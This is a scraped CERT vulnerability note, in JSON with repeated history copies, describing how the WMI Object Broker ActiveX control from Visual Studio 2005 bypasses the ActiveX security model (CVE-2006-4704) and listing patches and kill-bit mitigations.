{"id": "VU:854856", "bulletinFamily": "info", "title": "WMI Object Broker ActiveX Control bypasses ActiveX security model", "description": "### Overview\n\nThe Microsoft WMI Object Broker ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**ActiveX**\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. \n \n**ActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n \n**ActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>): \n \n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n \n_If you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ \nThe MSDN article [Designing Secure ActiveX Controls](<http://msdn.microsoft.com/workshop/components/activex/security.asp>) states: \n \n_Controls are marked as not safe for scripting or data initialization by default. Don't implement them unless the functionality of the control is hampered without them._ \n**The WMI Object Broker ActiveX control** \n \nThe WMI Object Broker ActiveX control is an object that comes with Microsoft Visual Studio 2005. It may also be present in other software packages. The control is provided by the file `wmiscriptutils.dll`. This control is marked as \"safe for scripting,\" which means that a web page can control the object, such as by calling its methods. \n \n**The problem** \n \nThe WMI Object Broker ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. For example, the \"[kill bit](<http://support.microsoft.com/kb/240797>)\" and \"[safe for scripting](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>)\" options are ignored. \n \nNote that public reports indicate this vulnerability is actively being exploited. \n \nFor more information refer to Microsoft Security Advisory ([927709](<http://www.microsoft.com/technet/security/advisory/927709.mspx>)). \n \n--- \n \n### Impact\n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution\n\n**Apply Updates** \n \nApply the appropriate updates described in Microsoft Security Bulletin [MS06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). This update provides a newer version of the WMI Object Broker ActiveX control. Microsoft Security Bulletin [MS07-016](<http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>) also sets the kill bit for the WMI Object Broker ActiveX control, which prevents Internet Explorer from using it. \n \n--- \n \n \n**Disable the WMI Object Broker ActiveX control in Internet Explorer** \n \nThe WMI Object Broker ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}` \n \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document[](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 13 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23854856 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>\n * <http://www.microsoft.com/technet/security/advisory/927709.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>\n * <http://support.microsoft.com/kb/925674>\n * <http://support.microsoft.com/kb/929233/>\n * <http://msdn.microsoft.com/workshop/components/activex/safety.asp>\n * <http://support.microsoft.com/kb/240797>\n * <http://secunia.com/advisories/22603/>\n * <http://www.securityfocus.com/bid/20797>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-047.html>\n\n### Credit\n\nThis vulnerability was publicly reported by Michal Bucko and H D Moore.\n\nThis document was written by Jeff Gennari and Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-4704](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704>)\n * Date Public: 01 Nov 2006\n * Date First Published: 01 Nov 2006\n * Date Last Updated: 05 Jan 2009\n * Severity Metric: 37.46\n * Document Revision: 31\n\n", "published": "2006-11-01T00:00:00", "modified": "2009-01-05T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.kb.cert.org/vuls/id/854856", "reporter": "CERT", "references": ["http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://support.microsoft.com/kb/929233/", "http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp", "http://www.microsoft.com/technet/security/advisory/927709.mspx", "http://www.securityfocus.com/bid/20797", "http://support.microsoft.com/kb/925674", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704", "http://secunia.com/advisories/22603/", "http://www.microsoft.com/com/default.mspx", "http://msdn.microsoft.com/workshop/components/activex/security.asp", "http://support.microsoft.com/kb/216434/", "http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://www.zerodayinitiative.com/advisories/ZDI-06-047.html", "http://www.microsoft.com/technet/security/advisory/927709.mspx ", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp"], "cvelist": ["CVE-2006-4704", "CVE-2006-4704"], "type": "cert", "lastseen": "2018-08-31T02:38:12", "history": [{"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-4704", "CVE-2006-4704"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "### Overview\n\nThe Microsoft WMI Object Broker ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**ActiveX**\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. \n \n**ActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n \n**ActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>): \n\n\n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n \n_If you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ The MSDN article [Designing Secure ActiveX Controls](<http://msdn.microsoft.com/workshop/components/activex/security.asp>) states: \n\n\n_Controls are marked as not safe for scripting or data initialization by default. Don't implement them unless the functionality of the control is hampered without them._ **The WMI Object Broker ActiveX control** \n \nThe WMI Object Broker ActiveX control is an object that comes with Microsoft Visual Studio 2005. It may also be present in other software packages. The control is provided by the file `wmiscriptutils.dll`. This control is marked as \"safe for scripting,\" which means that a web page can control the object, such as by calling its methods. \n \n**The problem** \n \nThe WMI Object Broker ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. For example, the \"[kill bit](<http://support.microsoft.com/kb/240797>)\" and \"[safe for scripting](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>)\" options are ignored. \n \nNote that public reports indicate this vulnerability is actively being exploited. \n \nFor more information refer to Microsoft Security Advisory ([927709](<http://www.microsoft.com/technet/security/advisory/927709.mspx>)). \n \n--- \n \n### Impact\n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution\n\n**Apply Updates** \n \nApply the appropriate updates described in Microsoft Security Bulletin [MS06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). This update provides a newer version of the WMI Object Broker ActiveX control. Microsoft Security Bulletin [MS07-016](<http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>) also sets the kill bit for the WMI Object Broker ActiveX control, which prevents Internet Explorer from using it. \n \n--- \n \n \n**Disable the WMI Object Broker ActiveX control in Internet Explorer** \n \nThe WMI Object Broker ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n\n\n`{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}` \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document[](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 13 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23854856 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>\n * <http://www.microsoft.com/technet/security/advisory/927709.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>\n * <http://support.microsoft.com/kb/925674>\n * <http://support.microsoft.com/kb/929233/>\n * <http://msdn.microsoft.com/workshop/components/activex/safety.asp>\n * <http://support.microsoft.com/kb/240797>\n * <http://secunia.com/advisories/22603/>\n * <http://www.securityfocus.com/bid/20797>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-047.html>\n\n### Credit\n\nThis vulnerability was publicly reported by Michal Bucko and H D Moore.\n\nThis document was written by Jeff Gennari and Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-4704](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704>)\n * Date Public: 01 Nov 2006\n * Date First Published: 01 Nov 2006\n * Date Last Updated: 05 Jan 2009\n * Severity Metric: 37.46\n * Document Revision: 31\n\n", "edition": 1, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "8a19002f034ab1d8845acaa11c0e1a0d9c620979b65ea43a6337494e67da121e", "hashmap": [{"hash": "0b7c22e7dbc334618a09b5b7d08cebd9", "key": "published"}, {"hash": "53205ce05ee12dcb18c267608e38026a", "key": "modified"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "32fdbd98427634f186486a5af393ec33", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "4f03edb9c7c46f5f763bc03123f78d4a", "key": "href"}, {"hash": "33108fc36076afd2f7b12e673471da47", "key": "title"}, {"hash": "b88fed7493afbd0ecd297013b4b81ed2", "key": "cvelist"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "929f1f54f38c64cdf1c4e514836ceecc", "key": "description"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/854856", "id": "VU:854856", "lastseen": "2016-02-03T09:13:00", "modified": "2009-01-05T00:00:00", "objectVersion": "1.2", "published": "2006-11-01T00:00:00", "references": ["http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://support.microsoft.com/kb/929233/", "http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp", "http://www.microsoft.com/technet/security/advisory/927709.mspx", "http://www.securityfocus.com/bid/20797", "http://support.microsoft.com/kb/925674", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704", "http://secunia.com/advisories/22603/", "http://www.microsoft.com/com/default.mspx", "http://msdn.microsoft.com/workshop/components/activex/security.asp", "http://support.microsoft.com/kb/216434/", "http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://www.zerodayinitiative.com/advisories/ZDI-06-047.html", "http://www.microsoft.com/technet/security/advisory/927709.mspx ", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp"], "reporter": "CERT", "title": "WMI Object Broker ActiveX Control bypasses ActiveX security model", "type": "cert", "viewCount": 0}, "differentElements": ["description"], "edition": 1, "lastseen": "2016-02-03T09:13:00"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-4704", "CVE-2006-4704"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Overview\n\nThe Microsoft WMI Object Broker ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**ActiveX**\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. \n \n**ActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n \n**ActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>): \n \n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n \n_If you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ \nThe MSDN article [Designing Secure ActiveX Controls](<http://msdn.microsoft.com/workshop/components/activex/security.asp>) states: \n \n_Controls are marked as not safe for scripting or data initialization by default. Don't implement them unless the functionality of the control is hampered without them._ \n**The WMI Object Broker ActiveX control** \n \nThe WMI Object Broker ActiveX control is an object that comes with Microsoft Visual Studio 2005. It may also be present in other software packages. The control is provided by the file `wmiscriptutils.dll`. This control is marked as \"safe for scripting,\" which means that a web page can control the object, such as by calling its methods. \n \n**The problem** \n \nThe WMI Object Broker ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. For example, the \"[kill bit](<http://support.microsoft.com/kb/240797>)\" and \"[safe for scripting](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>)\" options are ignored. \n \nNote that public reports indicate this vulnerability is actively being exploited. \n \nFor more information refer to Microsoft Security Advisory ([927709](<http://www.microsoft.com/technet/security/advisory/927709.mspx>)). \n \n--- \n \n### Impact\n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution\n\n**Apply Updates** \n \nApply the appropriate updates described in Microsoft Security Bulletin [MS06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). This update provides a newer version of the WMI Object Broker ActiveX control. Microsoft Security Bulletin [MS07-016](<http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>) also sets the kill bit for the WMI Object Broker ActiveX control, which prevents Internet Explorer from using it. \n \n--- \n \n \n**Disable the WMI Object Broker ActiveX control in Internet Explorer** \n \nThe WMI Object Broker ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}` \n \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document[](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 13 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23854856 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>\n * <http://www.microsoft.com/technet/security/advisory/927709.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>\n * <http://support.microsoft.com/kb/925674>\n * <http://support.microsoft.com/kb/929233/>\n * <http://msdn.microsoft.com/workshop/components/activex/safety.asp>\n * <http://support.microsoft.com/kb/240797>\n * <http://secunia.com/advisories/22603/>\n * <http://www.securityfocus.com/bid/20797>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-047.html>\n\n### Credit\n\nThis vulnerability was publicly reported by Michal Bucko and H D Moore.\n\nThis document was written by Jeff Gennari and Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-4704](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704>)\n * Date Public: 01 Nov 2006\n * Date First Published: 01 Nov 2006\n * Date Last Updated: 05 Jan 2009\n * Severity Metric: 37.46\n * Document Revision: 31\n\n", "edition": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "2f425a867c0a2e090168e04ce3c13c9c3c6a02daa1540f1371337c860c883f03", "hashmap": [{"hash": "0b7c22e7dbc334618a09b5b7d08cebd9", "key": "published"}, {"hash": "53205ce05ee12dcb18c267608e38026a", "key": "modified"}, {"hash": "b6ba9fa6ea18201bf39ea635ecca9f13", "key": "type"}, {"hash": "32fdbd98427634f186486a5af393ec33", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "4f03edb9c7c46f5f763bc03123f78d4a", "key": "href"}, {"hash": "33108fc36076afd2f7b12e673471da47", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "666155cdedc55f305e5050479b5730d8", "key": "description"}, {"hash": "b88fed7493afbd0ecd297013b4b81ed2", "key": "cvelist"}, {"hash": "5d2cfab83ed6e86a4812690790dc7ad5", "key": "reporter"}], "history": [], "href": "https://www.kb.cert.org/vuls/id/854856", "id": "VU:854856", "lastseen": "2018-08-30T20:37:24", "modified": "2009-01-05T00:00:00", "objectVersion": "1.3", "published": "2006-11-01T00:00:00", "references": ["http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx", "http://support.microsoft.com/kb/929233/", "http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx", "http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp", "http://www.microsoft.com/technet/security/advisory/927709.mspx", "http://www.securityfocus.com/bid/20797", "http://support.microsoft.com/kb/925674", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704", "http://secunia.com/advisories/22603/", "http://www.microsoft.com/com/default.mspx", "http://msdn.microsoft.com/workshop/components/activex/security.asp", "http://support.microsoft.com/kb/216434/", "http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://support.microsoft.com/kb/240797", "http://www.zerodayinitiative.com/advisories/ZDI-06-047.html", "http://www.microsoft.com/technet/security/advisory/927709.mspx ", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp", "http://msdn.microsoft.com/workshop/components/activex/safety.asp"], "reporter": "CERT", "title": "WMI Object Broker ActiveX Control bypasses ActiveX security model", "type": "cert", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T20:37:24"}, {"bulletin": {"bulletinFamily": "info", "cvelist": ["CVE-2006-4704", "CVE-2006-4704"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "### Overview\n\nThe Microsoft WMI Object Broker ActiveX control bypasses the ActiveX security model, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\n**ActiveX**\n\n[ActiveX](<http://www.microsoft.com/com/default.mspx>) is a technology that allows programmers to create reusable software components that can be incorporated into applications to extend their functionality. Internet Explorer is a common Windows application that makes use of ActiveX controls. \n \n**ActiveX safety determination** \n \nInternet Explorer determines if an ActiveX control is safe by querying the [IObjectSafety interface](<http://msdn.microsoft.com/workshop/components/com/reference/ifaces/iobjectsafety/iobjectsafety.asp>) of the object and by querying the Implemented Categories registry key for the control, as specified by [Microsoft Knowledge Base Article 216434](<http://support.microsoft.com/kb/216434/>) and the [MSDN ActiveX safety article](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>). \n \n**ActiveX security options** \n \nThrough either the IObjectSafety interface or the appropriate registry values, an ActiveX control can be marked as \"safe for scripting\" and/or \"safe for initialization.\" According to the MSDN article [Signing and Marking ActiveX Controls](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dnaxctrl/html/msdn_signmark.asp>): \n \n_If you mark your control as safe for initializing, you are asserting that no matter what values are used to initialize your control, it won't do anything that would damage a user's system or compromise the user's security._ \n \n_If you mark your control as safe for scripting, you are asserting that your control won't do anything to damage a user's system or compromise the user's security, regardless of how your control's methods and properties are manipulated by the Web page's script. In other words, it has to accept any method calls (with any parameters) and/or property manipulations in any order without doing anything bad._ \nThe MSDN article [Designing Secure ActiveX Controls](<http://msdn.microsoft.com/workshop/components/activex/security.asp>) states: \n \n_Controls are marked as not safe for scripting or data initialization by default. Don't implement them unless the functionality of the control is hampered without them._ \n**The WMI Object Broker ActiveX control** \n \nThe WMI Object Broker ActiveX control is an object that comes with Microsoft Visual Studio 2005. It may also be present in other software packages. The control is provided by the file `wmiscriptutils.dll`. This control is marked as \"safe for scripting,\" which means that a web page can control the object, such as by calling its methods. \n \n**The problem** \n \nThe WMI Object Broker ActiveX control includes a method that can create an instance of an ActiveX control that exists on the system. The ActiveX objects created in this manner will bypass the ActiveX security model. For example, the \"[kill bit](<http://support.microsoft.com/kb/240797>)\" and \"[safe for scripting](<http://msdn.microsoft.com/workshop/components/activex/safety.asp>)\" options are ignored. \n \nNote that public reports indicate this vulnerability is actively being exploited. \n \nFor more information refer to Microsoft Security Advisory ([927709](<http://www.microsoft.com/technet/security/advisory/927709.mspx>)). \n \n--- \n \n### Impact\n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution\n\n**Apply Updates** \n \nApply the appropriate updates described in Microsoft Security Bulletin [MS06-073](<http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>). This update provides a newer version of the WMI Object Broker ActiveX control. Microsoft Security Bulletin [MS07-016](<http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>) also sets the kill bit for the WMI Object Broker ActiveX control, which prevents Internet Explorer from using it. \n \n--- \n \n \n**Disable the WMI Object Broker ActiveX control in Internet Explorer** \n \nThe WMI Object Broker ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID: \n \n`{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}` \n \nMore information about how to set the kill bit is available in [Microsoft Support Document 240797](<http://support.microsoft.com/kb/240797>). \n \n**Disable ActiveX** \n \nDisabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this vulnerability. Instructions for disabling ActiveX in the Internet Zone can be found in the \"[Securing Your Web Browser\"](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) document[](<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>) and the [Malicious Web Scripts FAQ](<http://www.cert.org/tech_tips/malicious_code_FAQ.html#ie56>). \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nMicrosoft Corporation| | -| 13 Feb 2007 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23854856 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>\n * <http://www.microsoft.com/technet/security/advisory/927709.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms06-073.mspx>\n * <http://www.microsoft.com/technet/security/Bulletin/MS07-016.mspx>\n * <http://support.microsoft.com/kb/925674>\n * <http://support.microsoft.com/kb/929233/>\n * <http://msdn.microsoft.com/workshop/components/activex/safety.asp>\n * <http://support.microsoft.com/kb/240797>\n * <http://secunia.com/advisories/22603/>\n * <http://www.securityfocus.com/bid/20797>\n * <http://www.zerodayinitiative.com/advisories/ZDI-06-047.html>\n\n### Credit\n\nThis vulnerability was publicly reported by Michal Bucko and H D Moore.\n\nThis document was written by Jeff Gennari and Will Dormann.\n\n### Other Information\n\n * CVE IDs: [CVE-2006-4704](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4704>)\n * Date Public: 01 Nov 2006\n * Date First Published: 01 